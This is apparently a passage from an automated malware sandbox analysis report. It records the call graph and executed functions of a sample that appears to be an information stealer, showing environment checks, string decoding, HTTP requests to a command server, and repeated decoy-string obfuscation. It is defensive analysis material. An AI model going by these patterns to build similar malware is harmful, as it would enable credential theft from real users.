calls 27044->27045 27046 403aeb 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403b04 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403b1d 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403b36 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403b4f 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403b68 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403b81 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403b9a 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403bb3 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 403bcc 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403be5 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403bfe 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403c17 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403c30 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403c49 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403c62 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403c7b 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403c94 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403cad 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403cc6 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403cdf 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403cf8 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403d11 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403d2a 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403d43 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403d5c 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403d75 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403d8e 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403da7 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403dc0 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403dd9 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403df2 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403e0b 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403e24 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403e3d 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403e56 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403e6f 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403e88 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403ea1 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403eba 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403ed3 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403eec 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403f05 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403f1e 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403f37 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403f50 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403f69 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 403f82 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 403f9b 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 403fb4 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 403fcd 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 403fe6 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 403fff 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 404018 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 404031 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 40404a 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 404063 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 40407c 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 404095 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 4040ae 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 4040c7 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 4040e0 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 4040f9 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404112 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 40412b 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 404144 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 40415d 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 404176 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 40418f 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4041a8 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 4041c1 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 4041da 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 4041f3 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 40420c 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 404225 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 40423e 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 404257 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 404270 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 404289 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 4042a2 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 4042bb 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 4042d4 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 4042ed 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 404306 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 40431f 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 404338 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 404351 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 40436a 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 404383 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 40439c 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 4043b5 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 4043ce 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 4043e7 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 404400 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 404419 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 404432 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 40444b 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 404464 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 40447d 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 404496 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 4044af 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 4044c8 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 4044e1 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 4044fa 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 404513 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 40452c 27255->27256 27257 4045c0 34 API calls 27256->27257 27258 404545 27257->27258 27259 4045c0 34 API calls 27258->27259 27260 40455e 27259->27260 27261 4045c0 34 API calls 27260->27261 27262 404577 27261->27262 27263 4045c0 34 API calls 27262->27263 27264 404590 27263->27264 27265 4045c0 34 API calls 27264->27265 27266 4045a9 27265->27266 27267 419c10 27266->27267 27268 419c20 43 API calls 27267->27268 27269 41a036 8 API calls 27267->27269 27268->27269 27270 41a146 27269->27270 27271 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27269->27271 27272 41a153 8 API calls 27270->27272 27273 41a216 27270->27273 27271->27270 27272->27273 27274 41a298 27273->27274 27275 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27273->27275 27276 41a2a5 6 API calls 27274->27276 27277 41a337 27274->27277 27275->27274 27276->27277 27278 41a344 9 API calls 27277->27278 27279 41a41f 27277->27279 27278->27279 27280 41a4a2 27279->27280 27281 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27279->27281 27282 41a4ab GetProcAddress GetProcAddress 27280->27282 27283 41a4dc 27280->27283 27281->27280 27282->27283 27284 41a515 27283->27284 27285 41a4e5 GetProcAddress GetProcAddress 27283->27285 27286 41a612 27284->27286 27287 41a522 10 API calls 27284->27287 27285->27284 27288 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27286->27288 27289 41a67d 27286->27289 27287->27286 27288->27289 27290 41a686 GetProcAddress 27289->27290 27291 41a69e 27289->27291 27290->27291 27292 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27291->27292 27293 415ca3 27291->27293 27292->27293 27294 401590 27293->27294 27569 401670 27294->27569 27297 41a7a0 lstrcpy 27298 4015b5 27297->27298 27299 41a7a0 lstrcpy 27298->27299 27300 4015c7 27299->27300 27301 41a7a0 lstrcpy 27300->27301 27302 4015d9 27301->27302 27303 41a7a0 lstrcpy 27302->27303 27304 401663 27303->27304 27305 415510 27304->27305 27306 415521 27305->27306 27307 41a820 2 API calls 27306->27307 27308 41552e 27307->27308 27309 41a820 2 API calls 27308->27309 27310 41553b 27309->27310 27311 41a820 2 API calls 27310->27311 27312 415548 27311->27312 27313 41a740 lstrcpy 27312->27313 27314 415555 27313->27314 27315 41a740 lstrcpy 27314->27315 27316 415562 27315->27316 27317 41a740 lstrcpy 27316->27317 27318 41556f 27317->27318 27319 41a740 lstrcpy 27318->27319 27330 41557c 27319->27330 27320 41a740 lstrcpy 27320->27330 27321 415643 StrCmpCA 27321->27330 27322 4156a0 StrCmpCA 27323 4157dc 27322->27323 27322->27330 27324 41a8a0 lstrcpy 27323->27324 27326 4157e8 27324->27326 27325 401590 lstrcpy 27325->27330 27327 41a820 2 API calls 27326->27327 27328 4157f6 27327->27328 27332 41a820 2 API calls 27328->27332 27329 415856 StrCmpCA 27329->27330 27333 415991 27329->27333 27330->27320 27330->27321 27330->27322 27330->27325 27330->27329 27331 41a7a0 lstrcpy 27330->27331 27338 41a820 lstrlenA lstrcpy 27330->27338 27341 415a0b StrCmpCA 27330->27341 27346 41a8a0 lstrcpy 27330->27346 27352 4152c0 29 API calls 27330->27352 27355 41578a StrCmpCA 27330->27355 27358 41593f StrCmpCA 27330->27358 27359 4151f0 23 API calls 27330->27359 27331->27330 27335 415805 27332->27335 27334 41a8a0 lstrcpy 27333->27334 27336 41599d 27334->27336 27337 401670 lstrcpy 27335->27337 27339 41a820 2 API calls 27336->27339 27357 415811 27337->27357 27338->27330 27340 4159ab 27339->27340 27342 41a820 2 API calls 27340->27342 27343 415a16 Sleep 27341->27343 27344 415a28 27341->27344 27347 4159ba 27342->27347 27343->27330 27345 41a8a0 lstrcpy 27344->27345 27348 415a34 27345->27348 27346->27330 27349 401670 lstrcpy 27347->27349 27350 41a820 2 API calls 27348->27350 27349->27357 27351 415a43 27350->27351 27353 41a820 2 API calls 27351->27353 27352->27330 27354 415a52 27353->27354 27356 401670 lstrcpy 27354->27356 27355->27330 27356->27357 27357->26413 27358->27330 27359->27330 27361 417553 GetVolumeInformationA 27360->27361 27362 41754c 27360->27362 27368 417591 27361->27368 27362->27361 27363 4175fc GetProcessHeap HeapAlloc 27364 417619 27363->27364 27365 417628 wsprintfA 27363->27365 27366 41a740 lstrcpy 27364->27366 27367 41a740 lstrcpy 27365->27367 27369 415da7 27366->27369 27367->27369 27368->27363 27369->26434 27371 41a7a0 lstrcpy 27370->27371 27372 404899 27371->27372 27578 4047b0 27372->27578 27374 4048a5 27375 41a740 lstrcpy 27374->27375 27376 4048d7 27375->27376 27377 41a740 lstrcpy 27376->27377 27378 4048e4 27377->27378 27379 41a740 lstrcpy 27378->27379 27380 4048f1 27379->27380 27381 41a740 lstrcpy 27380->27381 27382 4048fe 27381->27382 27383 41a740 lstrcpy 27382->27383 27384 40490b InternetOpenA StrCmpCA 27383->27384 27385 404944 27384->27385 27386 404955 27385->27386 27387 404ecb InternetCloseHandle 27385->27387 27591 418b60 GetSystemTime lstrcpy lstrcpy 27386->27591 27389 404ee8 27387->27389 27586 409ac0 CryptStringToBinaryA 27389->27586 27390 404963 27592 41a920 lstrcpy lstrcpy lstrcatA 27390->27592 27393 404976 27395 41a8a0 lstrcpy 27393->27395 27400 40497f 27395->27400 27396 41a820 2 API calls 27397 404f05 27396->27397 27399 41a9b0 4 API calls 27397->27399 27398 404f27 codecvt 27402 41a7a0 lstrcpy 27398->27402 27401 404f1b 27399->27401 27404 41a9b0 4 API calls 27400->27404 27403 41a8a0 lstrcpy 27401->27403 27408 404f57 27402->27408 27403->27398 27405 4049a9 27404->27405 27406 41a8a0 lstrcpy 27405->27406 27407 4049b2 27406->27407 27409 41a9b0 4 API calls 27407->27409 27408->26437 27410 4049d1 27409->27410 27411 41a8a0 lstrcpy 27410->27411 27412 4049da 27411->27412 27593 41a920 lstrcpy lstrcpy lstrcatA 27412->27593 27414 4049f8 27415 41a8a0 lstrcpy 27414->27415 27416 404a01 27415->27416 27417 41a9b0 4 API calls 27416->27417 27418 404a20 27417->27418 27419 41a8a0 lstrcpy 27418->27419 27420 404a29 27419->27420 27421 41a9b0 4 API calls 27420->27421 27422 404a48 27421->27422 27423 41a8a0 lstrcpy 27422->27423 27424 404a51 27423->27424 27425 41a9b0 4 API calls 27424->27425 27426 404a7d 27425->27426 27594 41a920 lstrcpy lstrcpy lstrcatA 27426->27594 27428 404a84 27429 41a8a0 lstrcpy 27428->27429 27430 404a8d 27429->27430 27431 404aa3 InternetConnectA 27430->27431 27431->27387 27432 404ad3 HttpOpenRequestA 27431->27432 27434 404b28 27432->27434 27435 404ebe InternetCloseHandle 27432->27435 27436 41a9b0 4 API calls 27434->27436 27435->27387 27437 404b3c 27436->27437 27438 41a8a0 lstrcpy 27437->27438 27439 404b45 27438->27439 27595 41a920 lstrcpy lstrcpy lstrcatA 27439->27595 27441 404b63 27442 41a8a0 lstrcpy 27441->27442 27443 404b6c 27442->27443 27444 41a9b0 4 API calls 27443->27444 27445 404b8b 27444->27445 27446 41a8a0 lstrcpy 27445->27446 27447 404b94 27446->27447 27448 41a9b0 4 API calls 27447->27448 27449 404bb5 27448->27449 27450 41a8a0 lstrcpy 27449->27450 27451 404bbe 27450->27451 27452 41a9b0 4 API calls 27451->27452 27453 404bde 27452->27453 27454 41a8a0 lstrcpy 27453->27454 27455 404be7 27454->27455 27456 41a9b0 4 API calls 27455->27456 27457 404c06 27456->27457 27458 41a8a0 lstrcpy 27457->27458 27459 404c0f 27458->27459 27596 41a920 lstrcpy lstrcpy lstrcatA 27459->27596 27461 404c2d 27462 41a8a0 lstrcpy 27461->27462 27463 404c36 27462->27463 27464 41a9b0 4 API calls 27463->27464 27465 404c55 27464->27465 27466 41a8a0 lstrcpy 27465->27466 27467 404c5e 27466->27467 27468 41a9b0 4 API calls 27467->27468 27469 404c7d 27468->27469 27470 41a8a0 lstrcpy 27469->27470 27471 404c86 27470->27471 27597 41a920 lstrcpy lstrcpy lstrcatA 27471->27597 27473 404ca4 27474 41a8a0 lstrcpy 27473->27474 27475 404cad 27474->27475 27476 41a9b0 4 API calls 27475->27476 27477 404ccc 27476->27477 27478 41a8a0 lstrcpy 27477->27478 27479 404cd5 27478->27479 27480 41a9b0 4 API calls 27479->27480 27481 404cf6 27480->27481 27482 41a8a0 lstrcpy 27481->27482 27483 404cff 27482->27483 27484 41a9b0 4 API calls 27483->27484 27485 404d1f 27484->27485 27486 41a8a0 lstrcpy 27485->27486 27487 404d28 27486->27487 27488 41a9b0 4 API calls 27487->27488 27489 404d47 27488->27489 27490 41a8a0 lstrcpy 27489->27490 27491 404d50 27490->27491 27598 41a920 lstrcpy lstrcpy lstrcatA 27491->27598 27493 404d6e 27494 41a8a0 lstrcpy 27493->27494 27495 404d77 27494->27495 27496 41a740 lstrcpy 27495->27496 27497 404d92 27496->27497 27599 41a920 lstrcpy lstrcpy lstrcatA 27497->27599 27499 404db3 27600 41a920 lstrcpy lstrcpy lstrcatA 27499->27600 27501 404dba 27502 41a8a0 lstrcpy 27501->27502 27503 404dc6 27502->27503 27504 404de7 lstrlenA 27503->27504 27505 404dfa 27504->27505 27506 404e03 lstrlenA 27505->27506 27601 41aad0 27506->27601 27508 404e13 HttpSendRequestA 27509 404e32 InternetReadFile 27508->27509 27510 404e67 InternetCloseHandle 27509->27510 27515 404e5e 27509->27515 27512 41a800 27510->27512 27512->27435 27513 41a9b0 4 API calls 27513->27515 27514 41a8a0 lstrcpy 27514->27515 27515->27509 27515->27510 27515->27513 27515->27514 27606 41aad0 27516->27606 27518 4117c4 StrCmpCA 27519 4117d7 27518->27519 27520 4117cf ExitProcess 27518->27520 27521 4117e7 strtok_s 27519->27521 27524 4117f4 27521->27524 27522 4119c2 27522->26439 27523 41199e strtok_s 27523->27524 27524->27522 27524->27523 27525 4118ad StrCmpCA 27524->27525 27526 4118cf StrCmpCA 27524->27526 27527 4118f1 StrCmpCA 27524->27527 27528 411951 StrCmpCA 27524->27528 27529 411970 StrCmpCA 27524->27529 27530 411913 StrCmpCA 27524->27530 27531 411932 StrCmpCA 27524->27531 27532 41185d StrCmpCA 27524->27532 27533 41187f StrCmpCA 27524->27533 27534 41a820 lstrlenA lstrcpy 27524->27534 27535 41a820 2 API calls 27524->27535 27525->27524 27526->27524 27527->27524 27528->27524 27529->27524 27530->27524 27531->27524 27532->27524 27533->27524 27534->27524 27535->27523 27536->26445 27537->26447 27538->26453 27539->26455 27540->26461 27541->26463 27542->26467 27543->26471 27544->26475 27545->26481 27546->26483 27547->26487 27548->26501 27549->26505 27550->26504 27551->26500 27552->26504 27553->26519 27554->26508 27555->26510 27556->26513 27557->26516 27558->26521 27559->26528 27560->26531 27561->26537 27562->26558 27563->26561 27564->26562 27565->26557 27566->26562 27567->26571 27570 41a7a0 lstrcpy 27569->27570 27571 401683 27570->27571 27572 41a7a0 lstrcpy 27571->27572 27573 401695 27572->27573 27574 41a7a0 lstrcpy 27573->27574 27575 4016a7 27574->27575 27576 41a7a0 lstrcpy 27575->27576 27577 4015a3 27576->27577 27577->27297 27602 401030 27578->27602 27582 404838 lstrlenA 27605 41aad0 27582->27605 27584 404848 InternetCrackUrlA 27585 404867 27584->27585 27585->27374 27587 409af9 LocalAlloc 27586->27587 27588 404eee 27586->27588 27587->27588 27589 409b14 CryptStringToBinaryA 27587->27589 27588->27396 27588->27398 27589->27588 27590 409b39 LocalFree 27589->27590 27590->27588 27591->27390 27592->27393 27593->27414 27594->27428 27595->27441 27596->27461 27597->27473 27598->27493 27599->27499 27600->27501 27601->27508 27603 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27602->27603 27604 41aad0 27603->27604 27604->27582 27605->27584 27606->27518 27724 416ab1 902 API calls 27698 4069f3 7 API calls 27760 7f13c7 strtok_s strtok_s 27729 41cafe 219 API calls 4 library calls 27731 7e6ebc VirtualProtect 27666 7f04b7 88 API calls 27667 7f0cb6 30 API calls 26178 401190 26185 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26178->26185 26180 40119e 26181 4011cc 26180->26181 26187 417850 GetProcessHeap HeapAlloc GetUserNameA 26180->26187 26183 4011b7 26183->26181 26184 4011c4 ExitProcess 26183->26184 26186 417939 26185->26186 26186->26180 26188 4178c3 26187->26188 26188->26183 27668 7fd0af RtlLeaveCriticalSection __initptd 27734 7f32ae 22 API calls 27669 7f140b StrCmpCA strtok_s 27735 41ce9f 69 API calls __amsg_exit 27701 7fcd90 173 API calls 3 library calls 27671 4088a4 RaiseException task __CxxThrowException@8 27672 4180a5 GetProcessHeap HeapFree 27737 7f0297 131 API calls 27739 7fae93 43 API calls ctype 27702 7fcd8f 6 API calls 2 library calls 27673 7f102b StrCmpCA strtok_s lstrlen lstrcpy 27703 41b9b0 RtlUnwind 27704 7f118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27675 7f3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s

                                    Executed Functions

                                    Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                    • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                    • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                    • strlen.MSVCRT ref: 004046F0
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
